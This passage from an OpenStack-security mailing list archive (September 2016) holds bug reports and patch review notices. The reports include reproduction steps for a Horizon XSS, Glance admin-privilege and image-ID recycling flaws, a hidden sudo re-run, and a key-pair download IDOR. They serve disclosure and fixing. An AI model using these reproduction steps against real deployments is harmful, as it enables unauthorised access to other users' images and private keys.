, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

This is bad

, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From tdecacqu at redhat.com Fri Sep 16 01:37:54 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Fri, 16 Sep 2016 01:37:54 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160916013755.11804.3744.launchpad@gac.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Using glance-manage db purge command opens possibility to recycle image- IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: Using glance-manage db purge command opens possibility to recycle image-IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From lhinds at redhat.com Fri Sep 16 06:43:39 2016 From: lhinds at redhat.com (Luke Hinds) Date: Fri, 16 Sep 2016 06:43:39 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160916064340.1777.78877.malone@wampee.canonical.com> Thanks Jeremy, I have this noted for next time. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: Using glance-manage db purge command opens possibility to recycle image-IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From rcresswe at cisco.com Fri Sep 16 08:38:07 2016 From: rcresswe at cisco.com (Rob Cresswell) Date: Fri, 16 Sep 2016 08:38:07 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160916083810.12200.30732.launchpad@gac.canonical.com> ** Changed in: horizon Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

This is bad

, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From 1605914 at bugs.launchpad.net Sun Sep 18 02:05:37 2016 From: 1605914 at bugs.launchpad.net (Amrith) Date: Sun, 18 Sep 2016 02:05:37 -0000 Subject: [Openstack-security] [Bug 1605914] Re: Hard coded security group References: <20160723182211.8674.89923.malonedeb@soybean.canonical.com> Message-ID: <20160918020540.1777.33013.launchpad@wampee.canonical.com> ** Changed in: trove Assignee: (unassigned) => Amrith (amrith) -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1605914 Title: Hard coded security group Status in OpenStack DBaaS (Trove): Confirmed Bug description: "trove create" also creates a security group, with hard coded values. Some of which is not what I want/need - especially the 'allow everything' rule! Please allow to specify existing SG(s) (preferably plural) on either the command line (preferably), or in the datastore/datastore_version configuration. Or possibly in the datastore section in trove*.conf. To manage notifications about this bug go to: https://bugs.launchpad.net/trove/+bug/1605914/+subscriptions From gerrit2 at review.openstack.org Wed Sep 21 15:01:10 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 21 Sep 2016 15:01:10 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit c8c1f9a62e854c48c5e480115bc69822496e5950 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From gerrit2 at review.openstack.org Wed Sep 21 15:02:30 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 21 Sep 2016 15:02:30 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit b66d4d997cf371d4d451aa9e57d351f4e045fc8d Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From 1493448 at bugs.launchpad.net Wed Sep 21 17:04:32 2016 From: 1493448 at bugs.launchpad.net (Mike Fedosin) Date: Wed, 21 Sep 2016 17:04:32 -0000 Subject: [Openstack-security] [Bug 1493448] Re: All operations are perfomed with admin priveleges when 'use_user_token' is False References: <20150908163321.8816.82829.malonedeb@wampee.canonical.com> Message-ID: <20160921170432.24180.11787.malone@gac.canonical.com> "use_user_token" and related glance config options were deprecated in Mitaka: https://review.openstack.org/#/c/237742/ Bug may be closed. ** Changed in: glance Status: Triaged => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1493448 Title: All operations are perfomed with admin priveleges when 'use_user_token' is False Status in Glance: Fix Released Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: In glance-api.conf we have a param called 'use_user_token' which is enabled by default. It was introduced to allow for reauthentication when tokens expire and prevents requests from silently failing. https://review.openstack.org/#/c/29967/ Unfortunately disabling this parameter leads to security issues and allows a regular user to perform any operation with admin rights. Steps to reproduce on devstack: 1. Change /etc/glance/glance-api.conf parameters and restart glance-api: # Pass the user's token through for API requests to the registry. # Default: True use_user_token = False # If 'use_user_token' is not in effect then admin credentials # can be specified. Requests to the registry on behalf of # the API will use these credentials. # Admin user name admin_user = glance # Admin password admin_password = nova # Admin tenant name admin_tenant_name = service # Keystone endpoint auth_url = http://127.0.0.1:5000/v2.0 (for v2 api it's required to enable registry service, too: data_api = glance.db.registry.api) 2. Create a private image with admin user: source openrc admin admin glance --os-image-api-version 1 image-create --name private --is-public False --disk-format qcow2 --container-format bare --file /etc/fstab +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | e533283e6aac072533d1d091a7d2e413 | | container_format | bare | | created_at | 2015-09-01T22:17:25.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | private | | owner | e1cec705e33b4dfaaece11b623f3c680 | | protected | False | | size | 616 | | status | active | | updated_at | 2015-09-01T22:17:27.000000 | | virtual_size | None | +------------------+--------------------------------------+ 3. Check the image list with admin user: glance --os-image-api-version 1 image-list +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | ID | Name | Disk Format | Container Format | Size | Status | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | 4a1703e7-72d1-4fce-8b5c-5bb1ef2a5047 | cirros-0.3.4-x86_64-uec | ami | ami | 25165824 | active | | c513f951-e1b0-4acd-8980-ae932f073039 | cirros-0.3.4-x86_64-uec-kernel | aki | aki | 4979632 | active | | de99e4b9-0491-4990-8b93-299377bf2c95 | cirros-0.3.4-x86_64-uec-ramdisk | ari | ari | 3740163 | active | | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | private | qcow2 | bare | 616 | active | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ 4. Enable demo user and get the image list: source openrc demo demo glance --os-image-api-version 1 image-list +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | ID | Name | Disk Format | Container Format | Size | Status | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | 4a1703e7-72d1-4fce-8b5c-5bb1ef2a5047 | cirros-0.3.4-x86_64-uec | ami | ami | 25165824 | active | | c513f951-e1b0-4acd-8980-ae932f073039 | cirros-0.3.4-x86_64-uec-kernel | aki | aki | 4979632 | active | | de99e4b9-0491-4990-8b93-299377bf2c95 | cirros-0.3.4-x86_64-uec-ramdisk | ari | ari | 3740163 | active | | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | private | qcow2 | bare | 616 | active | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ 5. Try to get access to admin's private image with demo user: glance --os-image-api-version 1 image-show private +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | e533283e6aac072533d1d091a7d2e413 | | container_format | bare | | created_at | 2015-09-01T22:17:25.000000 | | deleted | False | | disk_format | qcow2 | | id | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | private | | owner | e1cec705e33b4dfaaece11b623f3c680 | | protected | False | | size | 616 | | status | active | | updated_at | 2015-09-01T22:17:27.000000 | +------------------+--------------------------------------+ The same happens when demo user wants to create/update/delete any image. v2 with enabled registry backend is affected too. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1493448/+subscriptions From fungi at yuggoth.org Wed Sep 21 22:48:25 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 21 Sep 2016 22:48:25 -0000 Subject: [Openstack-security] [Bug 1611171] Re: re-runs self via sudo References: <20160809015520.22289.87995.malonedeb@soybean.canonical.com> Message-ID: <20160921224826.23521.28956.malone@gac.canonical.com> Consensus seems to confirm Tristan's observation this meets the VMT's class D report (security hardening) definition, so I'm marking our advisory task Won't Fix and annotating the bug status and tags accordingly. If the situation is discovered to be explicitly vulnerable after all, we can revisit it at that time. ** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1611171 Title: re-runs self via sudo Status in Cinder: In Progress Status in Designate: In Progress Status in ec2-api: In Progress Status in gce-api: In Progress Status in Manila: In Progress Status in masakari: Fix Released Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Status in Rally: In Progress Bug description: Hello, I'm looking through Designate source code to determine if is appropriate to include in Ubuntu Main. This isn't a full security audit. This looks like trouble: ./designate/cmd/manage.py def main(): CONF.register_cli_opt(category_opt) try: utils.read_config('designate', sys.argv) logging.setup(CONF, 'designate') except cfg.ConfigFilesNotFoundError: cfgfile = CONF.config_file[-1] if CONF.config_file else None if cfgfile and not os.access(cfgfile, os.R_OK): st = os.stat(cfgfile) print(_("Could not read %s. Re-running with sudo") % cfgfile) try: os.execvp('sudo', ['sudo', '-u', '#%s' % st.st_uid] + sys.argv) except Exception: print(_('sudo failed, continuing as if nothing happened')) print(_('Please re-run designate-manage as root.')) sys.exit(2) This is an interesting decision -- if the configuration file is _not_ readable by the user in question, give the executing user complete privileges of the user that owns the unreadable file. I'm not a fan of hiding privilege escalation / modifications in programs -- if a user had recently used sudo and thus had the authentication token already stored for their terminal, this 'hidden' use of sudo may be unexpected and unwelcome, especially since it appears that argv from the first call leaks through to the sudo call. Is this intentional OpenStack style? Or unexpected for you guys too? (Feel free to make this public at your convenience.) Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1611171/+subscriptions From gerrit2 at review.openstack.org Fri Sep 23 17:49:28 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Fri, 23 Sep 2016 17:49:28 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 1e804d7705a8398390c8f80ed7be2c9a6806d2c5 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Fri Sep 23 19:01:16 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Fri, 23 Sep 2016 19:01:16 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 1be46ea411bf172876498f840c79cce5ff2f53e7 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 16:48:10 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 16:48:10 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 1daafbcc638fa85a6cb13b6e9a77cdc22f373c84 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 17:56:27 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 17:56:27 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit a8cd0c10fd3839e92457b3ade7e1fb9290d9420b Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 18:00:55 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 18:00:55 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/376992 Log: commit 96948e48b140a9a47d26bf805230df41a44c9c00 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b (cherry picked from commit b66d4d997cf371d4d451aa9e57d351f4e045fc8d) From gerrit2 at review.openstack.org Mon Sep 26 18:28:56 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 18:28:56 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 19:40:54 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 19:40:54 +0000 Subject: [Openstack-security] [openstack/cursive] SecurityImpact review request change I8d7f43fb4c0573ac3681147eac213b369bbbcb3b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/357202 Log: commit b51b8e36ff8127abc1429b05c5e7c14b69f88afb Author: Peter Hamilton Date: Thu Aug 18 08:50:38 2016 -0400 Add certificate validation This change adds support for a certificate trust store. When performing signature verification, all certificates in the trust store are loaded into a certificate verification context. This context is used to validate the signing certificate, verifying that the certificate belongs to a valid certificate chain rooted in the trust store. The signature_utils.get_verifier function is updated to accept an additional, optional parameter: trust_store_path. This parameter should contain a valid filesystem path to the directory acting as the certificate trust store. If not provided, it defaults to None and the trust store will be considered empty. All new certificate utility code is added in a new module named certificate_utils. For more information on this work, see the spec: https://review.openstack.org/#/c/357151/ SecurityImpact DocImpact Change-Id: I8d7f43fb4c0573ac3681147eac213b369bbbcb3b From 1622690 at bugs.launchpad.net Mon Sep 26 20:02:23 2016 From: 1622690 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 26 Sep 2016 20:02:23 -0000 Subject: [Openstack-security] [Bug 1622690] Fix included in openstack/horizon 10.0.0.0rc1 References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160926200223.18035.49317.malone@wampee.canonical.com> This issue was fixed in the openstack/horizon 10.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

This is bad

, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From gerrit2 at review.openstack.org Tue Sep 27 14:23:04 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Tue, 27 Sep 2016 14:23:04 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/377734 Log: commit 6cba6b18a348e8fc2eb4ae25b636d065456a633c Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 (cherry picked from commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f) From gerrit2 at review.openstack.org Tue Sep 27 14:23:50 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Tue, 27 Sep 2016 14:23:50 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/377736 Log: commit c90830d71969f68768d898c1c178489f602214e2 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 (cherry picked from commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f) From tdecacqu at redhat.com Tue Sep 27 14:39:21 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 14:39:21 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927143922.23570.7206.launchpad@soybean.canonical.com> ** Information type changed from Private Security to Public ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - - -- - Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 14:52:24 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 14:52:24 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: <20160920124156.32348.22876.malonedeb@wampee.canonical.com> Message-ID: <20160927145224.23486.23401.malone@gac.canonical.com> Oops, wrong bug updated. Well now that this is public, I've added keystone to check that bug. ** Also affects: keystone Importance: Undecided Status: New -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1625619 Title: It is possible to download key pair for other user at the same project Status in OpenStack Dashboard (Horizon): New Status in OpenStack Identity (keystone): New Status in OpenStack Security Advisory: Incomplete Bug description: Bug was reproduced in mitaka openstack release. Steps to reproduce: 1. Login to horizon. 2. Click Project-> Compute -> Access and Security 3. Click "Key Pairs" tab 4. Click "Create Key Pair" button, enter keypair name. 5. On the next screen with download key dialog copy URL from browser URL field URL will be like http://server/horizon/project/access_and_security/keypairs//download 6. Click cancel to close download window. 7. Click Project->Compute->Instances. 8. In opened window select other key pair name from KEY PAIR column (it could be key pair for different user) 9. open new browser window, paste URL string from step 5. 10. Change in URL with name obtained from step 8 and press enter You will be prompted to download private key for other user. It isn't correct user should be able to download only his own keys To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1625619/+subscriptions From tdecacqu at redhat.com Tue Sep 27 15:16:29 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Tue, 27 Sep 2016 15:16:29 -0000 Subject: [Openstack-security] [Bug 1625619] Re: It is possible to download key pair for other user at the same project References: 